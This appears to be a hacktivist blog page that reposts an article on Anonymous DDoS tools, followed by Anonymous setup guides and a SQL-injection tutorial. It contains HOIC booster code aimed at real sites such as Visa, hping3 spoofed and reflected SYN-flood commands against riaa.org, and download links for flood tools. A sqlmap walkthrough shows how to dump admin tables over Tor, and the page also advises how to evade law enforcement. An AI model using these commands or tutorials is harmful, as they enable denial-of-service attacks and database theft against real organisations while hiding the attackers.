High Orbits and Slowlorises: understanding the Anonymous attack tools

Anonymous’ HOIC denial-of-service attack tool

Most members of Anonymous would prefer to stay, well, anonymous. But as the group has engaged in increasingly high-profile attacks on government and corporate websites, doing so effectively and staying out of harm’s way have become an ever-growing challenge. To protect itself, the group has altered its tactics over the past year to both increase the firepower of its attacks and shield members from the prying eyes of law enforcement.

In late 2011, members of Anonymous began to step away from their most well-known weapon for distributed denial of service attacks. While some in the group continued to try to get enthusiastic followers (or unwary webpage visitors) to use a Web browser version of the Low Orbit Ion Cannon attack tool, use of LOIC had led to the arrests of members of Anonymous and LulzSec last summer. More cautious and technically skilled Anons started to use a collection of other tools and security practices to both step up attacks and hide themselves from being tracked. A message spread through Anonymous’ IRC channels spells it out: “Do NOT use LOIC.”

The attacks on the websites of the Justice Department and others in the wake of the takedown of Megaupload.com were the first demonstration of the power of LOIC’s successor—a DDoS tool called the High Orbit Ion Cannon.

HOIC isn’t exactly rocket science. At its core, it is essentially a simple script for launching HTTP POST and GET requests at a targeted server, wrapped in a “lulz” friendly graphical interface. According to the documentation, it can be used to open up 256 attack sessions simultaneously—either targeting a single server, or going after multiple targets. The user can control the number of threads used per attack.

This rocket needs boosters

The code itself isn’t that sophisticated. HOIC is written in Basic—or, to be more accurate, Real Software’s Real Basic, the cross-platform version of the language originally developed for the Mac. The main power of HOIC is that it can be customized for each attack target relatively easily without having to know how to code, using “boosters,” modules with additional bits of Basic code that are interpreted at runtime.

HOIC’s boosters are used to tailor the HTTP requests sent by HOIC to the target for a specific type of attack. ”HOIC is pretty useless,” the documentation file that comes with the code says, “unless it is used in combination with ‘Boosters.’” And that’s putting it mildly—the attack code is generated based completely on what’s in the booster file. When an attack is launched, HOIC compiles the booster to create the HTTP headers to be sent, and sets the mode of the attack.

One approach commonly used in boosters is to create randomized requests in an attempt to defeat any content delivery network (CDN) or caching used to shield the server from traffic spikes. Some boosters use lists of URLs within a target site, appending them to a table in memory to be used by the attack thread:

// populate rotating urls
randURLs.Append "http://www.om.nl/"
randURLs.Append "http://www.om.nl/onderwerpen/cybercrime/"

The script also can include a randomized list of user agents, referring sites and random headers that are fed into HTTP requests to make the requests look more legitimate:

useragents.Append " Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
useragents.Append " Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
referers.Append " http://www.google.com/?q=" +URL

The booster script can also include parameters to set the volume of the attack, and to switch between GET and POST requests. For example, here’s the booster set up to attack a dynamic part of Visa’s webpage, using POST, complete with a form submission to the target page:

UsePost = true
Headers.Append(" User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.12) Gecko/20101027 Firefox/3.6.12" )
Headers.Append(" Keep-Alive: 115")
Headers.Append("Proxy-Connection: keep-alive")

Headers.Append(" Referer: http://visa.via.infonow.net/locator/global/AdvancedSearchAction.do")

Headers.Append(" Cookie: JSESSIONID=5D2E604F487FB5AC9DBF9A1FDEA7D86A.fta-web3" )

URL = "http://visa.via.infonow.net/locator/global/AdvancedSearchAction.do"

PostBuffer = "newSearch=true&airport=&pageid=adv&filteredNameSubmit=false&LOC=en_US&country=CHE&street1=2353464756867867876886786777777777777777777777777777786&building=&city=aaaaaaaaaaaaaaa&initialSearchName=&mapAndList=mapAndList&x=27&y=9"

While the scripts themselves can get fairly sophisticated in how they’re configured, a generic booster file distributed with HOIC makes it fairly simple for would-be DDoSers to build a custom booster for their target of ire of the moment and distribute it via a shared document site like PasteBin, Google Documents, or an Etherpad site. For example, when a hungry Anon got upset about a late pizza delivery on Valentine’s Day, he quickly shared a clip of Web addresses to start an impromptu DDoS on Pizza Hut.

The actual code that runs the attacks is executed as threads by a set of timers. ObjTarget.SendAttack is pretty straightforward:

'Creating the socket request
  Dim httpObj as HTTPSocket
  Dim i as integer
  Dim reqSize as integer = 0
  httpObj = New HTTPSocket
  
  ' Adding the headers generated by the booster
  for i = 0 to Headers.Ubound
    reqSize = reqSize + Headers(i).Len
    httpObj.SetRequestHeader(Headers(i).Left(Headers(i).InStr(":")-1), Headers(i).Mid(Headers(i).InStr(":")+1, Headers(i).Len - Headers(i).InStr(":")))
  Next
  
'For attacks wher POST has been chosen as the type of HTTP request
  if(UsePost) then
    reqSize = reqSize + PostBuffer.Len + 4 ' POST
    httpObj.SetPostContent(PostBuffer, "application/x-www-form-urlencoded")
    httpobj.Post URL
'For GET based attacks
  else
    reqSize = reqSize + 3 ' GET
    httpobj.Get URL
  end if
  
 'Tracking how much data has been sent to the target 
  TotalBytesSent = TotalBytesSent + reqSize

But Hoic isn’t the only tool that Anons are promoting.

The old(er) bag of tricks

Despite its improved attacks, HOIC still points an arrow straight back at the source of the DDoS. And some of the targets Anonymous’ various #Ops are going after aren’t suitable for straight-up HTTP attacks. So there are two other tools that have been tossed into Anon’s #Setup recommendations that aren’t exactly new to the security world: Hping and Slowloris, a pair of network security testing tools that also have the potential to be used for evil.

Hping is a TCP/IP "packet assembler and analyzer" initially developed and now maintained by Salvatore Sanfillipo, a Sicilian programmer. It uses a command-line interface similar to that of the pingnetwork utility, but it can do a lot more than make ICMP echo requests. It can be used to throw high volumes of TCP requests at a target, while masking the source of the attack through spoofing, as Anonymous’ tutorial shows:

### Normal hping DoS attack:

hping3 -S -i u100 riaa.org

### Spoofed random source address attack:

hping3 -S -i u100 riaa.org --rand-source

### Reflected attack(it looks like mpaa.org is DoS'ing riaa.org)

hping3 -S -i u100 riaa.org -a mpaa.org

Slowloris is a different sort of attack entirely—a slow HTTP attack that uses partial HTTP requests to a server, making it wait for more chunks of the request and slowly spooning them out to keep the IP socket on the server open. This type of attack works best against low-traffic sites on Apache and a variety of other Web servers by eating up available network ports on the server. It’s ideal for attacks on servers in places where there’s a concern about there being enough bandwidth for a brute-force DDoS to succeed, or where there’s concern about the collateral damage to other users on the same network. That’s why Slowloris was used against Iranian servers during the protests around the Iranian elections in 2009.

But Slowloris is not a tool for the masses. It requires Perl, and runs best on Linux. The author of Slowloris, known as RSnake, said that Windows users “will not be able to successfully execute a Slowloris denial of service from Windows…because Slowloris requires more than a few hundred sockets to work (sometimes a thousand or more), and Windows limits sockets to around 130, from what I've seen.”

However, a Python-based version of the exploit, PyLoris, gets around those limitations. It has a graphical interface, and can be used effectively from Windows; Christopher Gilbert, the developer of PyLoris, claims he’s tested PyLoris on Windows with "over 6000 connections, and [doesn’t] see why it couldn’t use more than that."

PyLoris also includes a feature called TOR Switcher, which allows attacks to be carried out over the anonymized Tor Network and switch between Tor "identities," changing the apparent location the attack is coming from at user-defined intervals.

A screenshot of PyLoris in action

Used individually, these tools can be somewhat effective in slowing down many of the sites that Anonymous targets. But as Curt Wilson, a researcher with Arbor Networks’ Security Engineering and Response Team, said to Ars in an interview, "If you use volumetric floods on top of specific application attacks [like Slowloris], it’s a pretty powerful combination."

And just by the sheer number of attacking systems that Anonymous can bring aboard to launch these attacks when its members and friends are highly motivated—as in the wake of the Megaupload shutdown—even the most basic of tools can cause problems for large websites.

Covering the trail

There is still the matter of being able to pull off these large attacks with volunteered computers and keeping those volunteers anonymous. While Hping can provide some obscuring of the source of an attack, the other tools point straight back at their source. So Anons have been eager to find ways to keep their IP addresses concealed.

The problem is that freely available anonymizing networks generally aren’t up to the task of handling the bandwidth of DOS attacks. Attempting to launch HOIC or other DDoS tools over Tor would amount to an attack on that network itself—and on the Anonymous members who use it to protect themselves. So with the exception of Slowloris and PyLoris attacks, which demand relatively little bandwidth, the Anonymous edict is “DO NOT DOS THROUGH TOR.”

Some Anons have turned to a variety of proxy tools—including a fairly suspicious commercial software package called AutoHideIP, which claims to anonymize users by connecting them through proxies for a one-time fee, even selecting the country from which their IP address appears to be located. Efforts by Ars to contact the creators of AutoHideIP, Coolware Max, were unsuccessful.

But there’s reason to be suspicious of the security of proxy services, and of other anonymizing services such as VPNs, because they could be compelled by law enforcement to turn over traffic logs. That was the case in the arrest of one alleged LulzSec member, who was apprehended after VPN provider HideMyAss.com turned over log data that helped trace him to Arizona.

For that reason, Anonymous’ best-practice advice for members is to stick to Anonine and VPNTunnel, two paid VPN-based anonymizing services based in Sweden — where privacy laws don’t require providers to keep access logs (and in some cases prohibit it).

Both of the services are based on OpenVPN, a GPL-based open source virtual private network technology available on Windows, MacOS and Linux. However, as Anonine has expanded service beyond Sweden, with servers available worldwide, some of its servers have started to keep logs in accordance with local laws—so Anonymous’ members are warned to specifically configure their clients for Swedish servers.

- #anonymous
- #Anon
- #anonymiss
- #antiacta
- #antisec
- #anonfamily
- #attack
- #antiSOPA
- #antipipa
- #community
- #citizens
- #democracy
- #hacker
- #hacking
- #hacktivist
- #H4ck3rz
- #interwebz
- #insurgency
- #insurgent
- #lulz
- #LulzWarfare
- #lulztime
- #LuLzWar
- #NO-ACTA
- #ows
- #OpNewBlood
- #occupywallstreet
- #OpCensorThis
- #occupytogether
- #occupytheworld
1 year ago
Permalink

STARTUP GUIDE

Setup Intro::

1 - Setting up USB Bootdrive

2 - Truecrypt for USB and HD

3 - Additional Tools for Hacktivist

1 - TUTORIAL HOW TO MAKE BOOTABLE USB

____________________________________________________________________________________

How to create a bootable Windows 7 USB flash drive

The USB flash drive has replaced the floppy disk drive as the best storage medium for transferring files, but it also has its uses as a replacement for CDs and DVDs. USB drives tend to be higher in capacity than disc media, but since they are more expensive, they cannot (yet) really be used as a replacement. There are reasons why you would, however, choose a USB device over a DVD disc, and bootable software is definitely one of them. Not only is it faster to copy data such as setup files from a USB drive, but during usage the access times are also significantly faster. Therefore, installing something like Windows 7 will work that much faster from a USB drive than from a DVD (and of course, is particularly useful for the PCs without an optical drive; this isn’t something we should just leave for the pirates to enjoy).

This guide will show you two different ways to create a USB flash drive that works just like a Windows 7 DVD. In order to follow this guide, you’ll need a USB flash drive with at least 4GB of free space and a copy of the Windows 7 installation disc.

Windows 7 USB DVD Download Tool

You are normally given this tool when you purchase from the online Microsoft Store .

The easiest way to turn a USB flash drive into a bootable Windows 7 installer is by using the tool Microsoft offers, cunningly named the Windows 7 USB/DVD Download Tool. To get started, download the installer [exe] from Microsoft.com and follow the basic steps to put it onto your computer; you can put it on the computer you plan to install Windows 7 on or another one, it doesn’t matter.

Once it is installed, it should create an icon on your desktop, so double-click that to open. If you can’t find it, use the search function in the Start Menu with a keyword like “USB.” Launching it should give you the above screen, and step one is to find the Windows 7 .ISO file. The tool only accepts .ISO images, so we recommend that you convert yours if it’s in a different DVD image format.

Step two is straightforward: simply choose USB device.

In step three, all you have to do is make sure that you are choosing the correct USB device. If you have other data on the device, move it to your hard drive, another USB device, or somewhere else before proceeding.

The tool will prompt you if it detects data on the device. Once your data is backed up elsewhere, click Erase USB Device.

You will get another prompt warning you that all the data will be wiped. Click Yes to continue.

The format will be very quick, while the copying of the files will take a little bit more time (about 10 to 15 minutes).

Once the process is complete, you should get the above confirmation message. At this point you can close the tool and use the USB drive to install Windows 7. Remember that you’ll have to choose to boot off the USB drive. Before doing so, you may want to open up the USB drive and double click on setup.exe to see if everything looks okay. If you want to be able to do this manually, see the next section, and if you want to be able to install any edition of Windows 7, skip to the section after that.

Manual Creation

Maybe you don’t like that Microsoft violated the GPL with the first version of the above tool (the company has since GPLed the code), or you’re old-school and just love using the command prompt. Regardless of what your reasons are for creating a bootable Windows 7 USB drive manually, we have the scoop on how to do it. First, open the command prompt (if you use UAC make sure to right click it and choose “Run as administrator”), type “diskpart” without the quotes, and hit enter. You can also get here by simply typing “diskpart” without the quotes into the Start Menu and hitting enter.

Now type “list disk” without the quotes and hit enter. Take a look at the Size column and figure out which disk number your USB drive is. Ours is number 1, so we’re going to type “select disk 1” without the quotes and hit enter. Now we’re going to wipe it by typing “clean” without the quotes and hitting enter (make sure to do a backup of the contents if you haven’t already).

At this point we want to prepare the USB drive for the files and make sure it is bootable. Type “create partition primary” without the quotes and hit enter. Then type “select partition 1” without the quotes and hit enter. Next type “active” without the quotes and hit enter. Finally, type “format fs=fat32” without quotes and hit enter (if you choose to use ntfs, you’ll later have to run the “Bootsect.exe /nt60 G:” command to put boot manager compatible files onto your USB flash drive to make it a bootable device). This one will take a while, so go grab a snack, we’ll wait. When that’s done, type “assign” without the quotes and hit enter (this will assign a new drive letter to the USB flash drive).

An AutoPlay window like the one above will appear. Remember the drive letter (in our case it is H:\), close the window, type “exit” without the quotes and hit enter. If you are working with an .ISO image, the best way to do this last part is to mount the file with a program like Virtual Clone Drive. Alternatively, you can extract the files from the .ISO image and simply copy them to the USB drive, but since we’ve been using the command prompt up to this point, we’ll show you how to do the last step with it as well.

If you don’t have the command prompt open, open it with administrative privileges, type “xcopy f:*.* /s/e/f hg:” without the quotes and hit enter. Note that you will likely have to replace “f:” with the drive letter for your Windows 7 DVD and “g:” with the drive letter for your USB flash drive. Don’t worry if install.wim takes a while to copy: it’s easily the biggest file on the disc.

Bonus: install any edition of Windows 7

This is a completely optional step and you only want to do this if you want to be able to choose which edition of Windows 7 to

install. In the command prompt, type “del g:\sources\ei.cfg” without the quotes and hit enter (where g:\ is your USB flash drive).

This will make sure that your Windows 7 installer no longer has a specific version of Windows 7 set as the default, and you will be prompted to choose the version you want to install. Remember that while this gives you a more universal Windows 7 installer, you still need to make sure you are choosing the edition that you own, or you will not be able to activate Windows 7 with the key you have obtained.

____________________________________________________________________________________

2 - TRUECRYPT HERE IS THE GUIDE AND HELP!! USE IT!

____________________________________________________________________________________

TUTORIAL HOW TO TRUECRYPT!http://www.truecrypt.org/

HERE IS TUTORIAL LINK! http://www.truecrypt.org/docs/tutorial

Main Features:

Creates a virtual encrypted disk within a file and mounts it as a real disk.
Encrypts an entire partition or storage device such as USB flash drive or hard drive.
Encrypts a partition or drive where Windows is installed (pre-boot authentication).
Encryption is automatic, real-time (on-the-fly) and transparent.
Parallelization and pipelining allow data to be read and written as fast as if the drive was not encrypted.
Encryption can be hardware-accelerated on modern processors.
Provides plausible deniability, in case an adversary forces you to reveal the password:
Hidden volume (steganography) and hidden operating system.
More information about the features of TrueCrypt may be found in the documentation.

____________________________________________________________________________________

NOW ONCE ALL THIS IS DONE YOU CAN USE THIS GUIDE HERE FOR THE FUN PART OF HACKING!

REASON FOR ALL THIS ABOVE IS SIMPLE:

1. Your main hard drive has nothing on it. Your backup USB Boot DOES!! AND ITS CRYPTED!!

2. Your main computer will be crypted and anything you didn’t authorize to be on it will be REMOVED! Including the traces of anything you don’t want known was installed IE a USB BOOT OS!

3. USB CAN BE BROKEN INTO A MILLION PIECES WITH EASE WERE YOU HAVE A 20$ LOSE THEN RATHER A HARD DRIVE AND OR COMPUTER!

4. MAKE SURE YOU HAVE ALL YOUR TRUECRYPT PASSWORDS 32+ Characters long. I WOULD HIGHLY SUGGEST A 64+ Character one. Use a sentence, a phrase and or anything that will not be easily found or decrypted.

____________________________________________________________________________________

GET A PRIVATE PAID FOR VPN! SPEND THE 5-10$ ITS FOR A GOOD CAUSE! THEN CHECK OUT THE SITES BELOW FOR WHAT YOU THINK WILL WORK BEST FOR YOU!

HOIC aka: High Orbit Ion Cannon Link to Download.

What is HOIC?

The high orbit ion cannon has the following features:

High-speed multi-threaded HTTP Flood

Simultaenously flood up to 256 websites at once

Built in scripting system to allow the deployment of ‘boosters’, scripts designed to thwart DDoS counter measures and increase DoS output.

Easy to use interface

Can be ported over to Linux/Mac with a few bug fixes (I do not have either systems so I do

Ability to select the number of threads in an ongoing attack

Ability to throttle attacks individually with three settings: LOW, MEDIUM, and HIGH and its written in a language where you can do a bunch of really nifty things just read the RealBasic manual, ;] also no Dependencies (single executable)

____________________________________________________________________________________

Slowloris HTTP Dos Link to Download.

What is Slowloris

Slowloris holds connections open by sending partial HTTP requests. It continues to send subsequent headers at regular intervals to keep the sockets from closing. In this way webservers can be quickly tied up. In particular, servers that have threading will tend to be vulnerable, by virtue of the fact that they attempt to limit the amount of threading they’ll allow. Slowloris must wait for all the sockets to become available before it’s successful at consuming them, so if it’s a high traffic website, it may take a while for the site to free up it’s sockets. So while you may be unable to see the website from your vantage point, others may still be able to see it until all sockets are freed by them and consumed by Slowloris. This is because other users of the system must finish their requests before the sockets become available for Slowloris to consume. If others re-initiate their connections in that brief time-period they’ll still be able to see the site. So it’s a bit of a race condition, but one that Slowloris will eventually always win - and sooner than later. Slowloris also has a few stealth features built into it. Firstly, it can be changed to send different host headers, if your target is a virtual host and logs are stored seperately per virtual host. But most importantly, while the attack is underway, the log file won’t be written until the request is completed. So you can keep a server down for minutes at a time without a single log file entry showing up to warn someone who might watching in that instant. Of course once your attack stops or once the session gets shut down there will be several hundred 400 errors in the web server logs. That’s unavoidable as Slowloris sits today, although it may be possible to turn them into 200 OK messages instead by completing a valid request, but Slowloris doesn’t yet do that. HTTPReady quickly came up as a possible solution to a Slowloris attack, because it won’t cause the HTTP server to launch until a full request is recieved. This is true only for GET and HEAD requests. As long as you give Slowloris the switch to modify it’s method to POST, HTTPReady turns out to be a worthless defense against this type of attack. This is NOT a TCP DoS, because it is actually making a full TCP connection, not a partial one, however it is making partial HTTP requests. It’s the equivalent of a SYN flood but over HTTP. One example of the difference is that if there are two web-servers running on the same machine one server can be DoSed without affecting the other webserver instance. Slowloris would also theoretically work over other protocols like UDP, if the program was modified slightly and the webserver supported it. Slowloris is also NOT a GET request flooder. Slowloris requires only a few hundred requests at long term and regular intervals, as opposed to tens of thousands on an ongoing basis.

____________________________________________________________________________________

|_| irc.anonops.pro:6667

SSL: irc.anonops.pro:6697

irc.anonops.bz:6667

SSL: irc.anonops.bz:6697

www.anonops.com

Welcome anons to #Setup

Here we will cover the basics you need to know in order to stay safe and get your software configured.

Stop asking us how to hack, how to take down a web site, how to get revenge on someone you know online,

this is _NOT_ what we are about and you will not get support. So stay on topic or kick/ban

VPN:

A vpn hides your real ip and replaces it with the tunnel you are connecting through, this means that you are extremely hard to trace back - not impossible however.

DO NOT use free VPN’s, proxies or TOR. Free VPN’s keep logs of users activity and would happily hand it over to any law enforcement agency. Some suggestions VPN providers that are trusted and don’t keep logs.

1. http://anonine.se

2. http://www.vpntunnel.se

Network testing tools, alternatives to LOIC: (Do NOT use LOIC)

Hping:

hping is a command-line oriented TCP/IP packet assembler/analyzer.

The interface is inspired to the ping(8) unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.

Easy to use system, when it has downloaded for your appropriate OS please install and choose to use

Homepage: http://www.hping.org/download.php - Windows/Linux

Pastebin: http://pastebin.com/zzewmMcn

http://www.youtube.com/watch?v=fagjmQi-sBY

http://www.youtube.com/watch?v=fRxnzAWX5ag

HPING COMMAND: hping3 -i u1 -S -p 80 (site)

Slowloris

The low bandwidth, yet greedy and poisonous HTTP client!

This is a Perl program requiring the Perl interpreter with the modules IO::Socket::INET, IO::Socket::SSL, and GetOpt::Long. Slowloris works MUCH better and faster if you have threading, so I highly encourage you to also install threads and threads::shared if you don’t have those modules already.

You can install modules using CPAN:

perl -MCPAN -e ‘install IO::Socket::INET’

perl -MCPAN -e ‘install IO::Socket::SSL’

Homepage: http://ha.ckers.org/slowloris/ - Linux

http://www.youtube.com/watch?v=kPo8wVxsXAA

Hoic:

- High-speed multi-threaded HTTP Flood

- Simultaenously flood up to 256 websites at once

- Built in scripting system to allow the deployment of ‘boosters’, scripts designed to thwart DDoS counter measures and increase DoS output.

- Easy to use interface

- Can be ported over to Linux/Mac with a few bug fixes (I do not have either systems so I do

- Ability to select the number of threads in an ongoing attack

- Ability to throttle attacks individually with three settings: LOW, MEDIUM, and HIGH

and its written in a language where you can do a bunch of really nifty things

just read the RealBasic manual, ;] also no Dependencies (single executable)

Homepage: http://hoic.99k.org/

Download: http://www.mediafire.com/?jkc7924jsa0161z

http://www.youtube.com/watch?v=qmhDQtsbPAk

HOIC BOOSTER Guide: http://pastebin.com/csqLqY9N

Pyloris:

PyLoris is a scriptable tool for testing a server’s vulnerability to connection exhaustion denial of service (DoS) attacks. PyLoris can utilize SOCKS proxies and SSL connections, and can target protocols such as HTTP, FTP, SMTP, IMAP, and Telnet.

Homepage: http://motomastyle.com/pyloris/

Sourceforge: http://sourceforge.net/projects/pyloris/

Pastebin http://pastebin.com/MTyHYXJe

Do NOT use Tor for Dos all it does is hit Tor.

Test DOS tools on 127.0.0.1

Do NOT click on random links posted in channels.

Some of these are IP grabbers, honeypots or may contain executable code. Do so at your own risk.

Do NOT give out personal information: name, email, passwords, etc. (Use your head)

Main Channel: #anonops

IRC/Anonymity help only: #opnewblood

Target Info: #DDOS

Software support/configuring: #Setup

———————————————————-

Other Languages: belgique: #opbelgium | čeština: #czech, cesi a slovaky #czsk |

dansk: #denmark | nederlands: #dutch | eesti keel: #estonia | francais: #francophone |

deutsch: #germany | italiano: #italy | norsk: #norway | język polski: #poland |

español: #hispania | brasil: #anonymousbr #ataque | mexico: #opmexico |

For a full list of channels: /list on IRC

Quick channel access if you do not have your own IRC client installed.

Webchat: http://webchat.anonops.pro/

http://search.mibbit.com/networks/AnonOps

Thank you all for reading and using my guide. This is only here to help those who want to do the right things. This is in no way a tutorial for you to be corrupt. But to be a voice. To be heard to make yourself seen. Join as one and be voice for a cause. Remember folks we are here to help each other.

CodeCompiler

#Setup

#Anonops

#Hack

#CodeChat

#DDos

Special thanks also goes out to those that stand up for the weak.

“The purpose of war is peace”

Saint Augustine - 354-430ad

By CodeCompiler Productions NO©™

Share by #OpHackStorm #OpShitStorm Joint-Venture

Putting toys in the hands of Boys

#Anonymous #H4ck3rz
Will Prepare You to Share chaos & mayhem for #LulzWar

☣ I’m a Pirate ☠

I am a 21st century Revolutionary, liberating files from the English, capitalist overlords.

☢☢☢ ☠ ☢☢☢ ☠ ☢☢☢

Long live the ones who dare.

UNITED AS ONE DIVIDED BY ZERO #WeAreLegion #SailStrong

☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠ SHARE NO©
☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠ SHARE NO©

- #anonymous
- #Anon
- #anonymiss
- #antisec
- #anonfamily
- #antiacta
- #antiSOPA
- #antipipa
- #community
- #citizens
- #democracy
- #expectus
- #evolution
- #freeweb
- #fight
- #freedom
- #free
- #hacker
- #hacking
- #hacktivist
- #H4ck3rz
- #interwebz
- #insurgency
- #insurgent
- #lulz
- #LulzWarfare
- #lulztime
- #LuLzWar
- #NO-ACTA
- #ows
1 year ago
Permalink

View Separately

SQLMAP For Dummies v1.0

Required for use: BackTrack 5 R1

Start your BackTrack 5 R1 (BT5) and start sqlmap, it can be found in /pentest/database/sqlmap/.

Now lets get started!

First we need a webpage, this normally is done by hand or by using dorks in google. To find out if a page is vulnerable to an injection we do this:

http://localhost.com/index.php?id=1337’

Notice the ‘ here: ^

This should give you a pretty error and a good start!

Lets open sqlmap!

So the first you need to learn is options, or settings you have to apply in sqlmap. The base is:

python sqlmap.py -u <website>

With a website we would simply do it like this

python sqlmap.py -u http://localhost/index.php?id=1337

(note we did not add the ‘ here)

-u stands for Url and tells sqlmap THIS is our url. But we have to add more options for sqlmap to work:

(note the following options use double dashes)

- -dbs to find DataBases

- -users to find users.

python sqlmap.py -u http://localhost/index.php?id=1337 - -dbs (and/or) - -users

(for the sake of lenght we will be assuming you used - -dbs in this tutorial)

After this command is ran you should come up with 0 results, or some results. If you read the text you might be able to find some databases, and if you do. Congratz!

Should look like this:

available databases [2]:

[*] database1

[*] database2

Now to the fun part!

python sqlmap.py -u http://localhost/index.php?id=1337 - -tables -D database1

This tells the program to find tables (- -tables) in database (-D) names: database1.

Once you execute this you will find (maybe) tons of tables. Locate the one you want…lets call it admin!

python sqlmap.py -u http://localhost/index.php?id=1337 -D database1 -T admin

Now you should see the info of the table admin. But now we should be able to dump it! This can be done by - -dump or - -dump-all.

Examples:

python sqlmap.py -u http://localhost/index.php?id=1337 - -tables -D database1 - -dump-all

python sqlmap.py -u http://localhost/index.php?id=1337 -D database1 -T admin - -dump

- -dump dumps the selected tables content, - -dump-all dumps EVERYTHING!

But, we should be secure?

Tor with SQLMAP:

First find /etc/apt/sources.list open it and add

deb http://deb.torproject.org/torproject.org lucid main

Open the terminal and use this commands:

gpg - -keyserver keys.gnupg.net —recv 886DDD89

gpg - -export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -

And now we need more commandos ran as root:

apt-get update apt-get install tor tor-geoipdb apt-get install polipo

Start tor: /etc/init.d/tor start grab the copy of this config file: https://gitweb.torproject.org/torbrowser.git/blob_plain/HEAD:/build-scripts/config/polipo.conf

Go to /etc/polipoconfig and replace the file with the one above. restart polipo: /etc/init.d/polipo restart

Congratz! now you can run sqlmap with TOR!

python sqlmap.py -u http://localhost/index.php?id=1337 -D database1 -T admin —dump —tor —random-agent

Happy safe hacking!

By Matrix Productions NO©™

http://www.twitter.com/TheAnonMatrix

Source:

http://www.coresec.org/2011/04/24/sqlmap-with-tor/

https://www.torproject.org/docs/debian.html.en#ubuntu

Share by #OpHackStorm #OpShitStorm Joint-Venture

Putting toys in the hands of Boys

#Anonymous #H4ck3rz
Will Prepare You to Share chaos & mayhem for #LulzWar

☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠ SHARE NO©
☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠ SHARE NO©

- #SQLI
- #anonymous
- #Anon
- #anonymiss
- #antisec
- #anonfamily
- #antiacta
- #antiSOPA
- #antipipa
- #hacker
- #hacking
- #hacktivist
- #H4ck3rz
- #community
- #citizens
- #democracy
- #expectus
- #evolution
- #free
- #freedom
- #freeweb
- #fight
- #GameOn
- #interwebz
- #insurgency
- #insurgent
- #lulz
- #LulzWarfare
- #lulztime
- #LuLzWar
1 year ago
2
Permalink

View Separately

Hcon’s Security Testing Framework (Hcon STF) v0.4 [Fire base]

Hcon respects & salutes to all of the freedom fighters of India, without whom we can never be able get our freedom.A tribute to all of the freedom fighters of all the countries we present HconSTF version 0.4 codename ‘Freedom’.Hope this year brings freedom for everyone on the internet form different governments & companies which are making the internet users their slaves.For this purpose HconSTF 0.4 has integrated many functions for anonymity and OSINT.

Some Highlight Features :

Categorized and comprehensive toolset
Contains hundreds of tools and features and script for different tasks like SQLi,XSS,Dorks,OSINT to name a few
HconSTF webUI with online tools (same as the Aqua base version of HconSTF)
Each and every option is configured for penetration testing and Vulnerability assessments
Specially configured and enhanced for gaining easy & solid anonymity
Works for web app testing assessments specially for owasp top 10
Easy to use & collaborative Operating System like interface
Light on Hardware Resources
Portable - no need to install, can work from any USB storage device
Multi-Language support (feature in heavy development translators needed)
Works side-by-side with your normal web browser without any conflict issues
Works on both architectures x86 & x64 on windows XP, Vista, 7 (works with ubuntu linux using wine)
Netbook compatible - User interface is designed for using framework on small screen sizes
Free & Open source and always will be

Categories of tools :

Information gathering / Analysis
Editors / Debuggers
Exploitation / Auditing
Anonymity
Passwords
Cryptography
Database
Scripting / Automation
Network Utilities
Reporting

License :

MPL,GPL,LGPL . in simple words its free as speech , no license fees.

Download Hcon STF v0.4 H3R3:

http://www.hcon.in/downloads.html

Share by #OpHackStorm #OpShitStorm Joint-Venture

Putting toys in the hands of Boys

#Anonymous #H4ck3rz
Will Prepare You to Share chaos & mayhem for #LulzWar

☣ I’m a Pirate ☠

I am a 21st century Revolutionary, liberating files from the English, capitalist overlords.

☢☢☢ ☠ ☢☢☢ ☠ ☢☢☢

Long live the ones who dare.

UNITED AS ONE DIVIDED BY ZERO #WeAreLegion #SailStrong

☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠ SHARE NO©
☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠ SHARE NO©

- #anonymous
- #Anon
- #anonymiss
- #antisec
- #anonfamily
- #ANTIACTA
- #ANTIPIPA
- #Anonymous
- #Citizens
- #Community
- #hacker
- #hacking
- #hacktivist
- #H4ck3rz
- #democracy
- #expectus
- #Evolution
- #free
- #freedom
- #fight
- #FreeWeb
- #interwebz
- #insurgency
- #insurgent
- #lulz
- #LulzWarfare
- #lulztime
- #LuLzWar
- #NO-ACTA
- #OpCensorThis
1 year ago
Permalink

Enable Windows 7 God Mode

How to Enable Windows 7 God Mode

Windows 7

Here’s a neat Windows 7 trick that’s been doing the rounds on the Internet. It enables “GodMode,” a term devised by the Microsoft development team, which provides a single place to access all Windows settings without needing to browse options and folders in the Control Panel.

To use it:

Create a new folder.
Rename the folder to:

GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}

(note that you can change the “GodMode” text, but the following period and code number are essential).

The folder icon will change — double click it to show the GodModewindow:

GodMode Window

The window shows nearly 50 sections with quick links to configuration options. Strictly speaking, it’s not a God Mode since all the options are available elsewhere. It’s more akin to an “all tasks” list — but you may find it easier than stumbling through Windows numerous screens and panels.

Big Red Warning!

The trick appears to work on both the 32 and 64-bit versions of Windows 7. Vista 32-bit and Windows Server 2008 32-bit should also work. However, it is known to crash 64-bit versions of Vista — and you may need to boot in safe mode or to the command line to delete the folder.

Share by #OpHackStorm #OpShitStorm Joint-Venture NO©

☣ I’m a Pirate ☠
I am a 21st century Revolutionary, liberating files from the English, capitalist overlords.

Long live the ones who dare..

NO©

☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE NO©

☠SHARE ☠SHARE ☠SHARE ☠SHARE ☠SHARE NO©

☢☢☢ ☠ ☢☢☢ ☠ ☢☢☢

#OpHackStorm ☣

Putting toys in the hands of Boys

#Anonymous #H4ck3rz
Will Prepare You to Share chaos & mayhem for #LulzWar

☢☢☢ ☠ ☢☢☢ ☠ ☢☢☢

☠ SHARE ☠ SHARE ☠ SHARE ☠ SHARE

☠ SHARE NO©

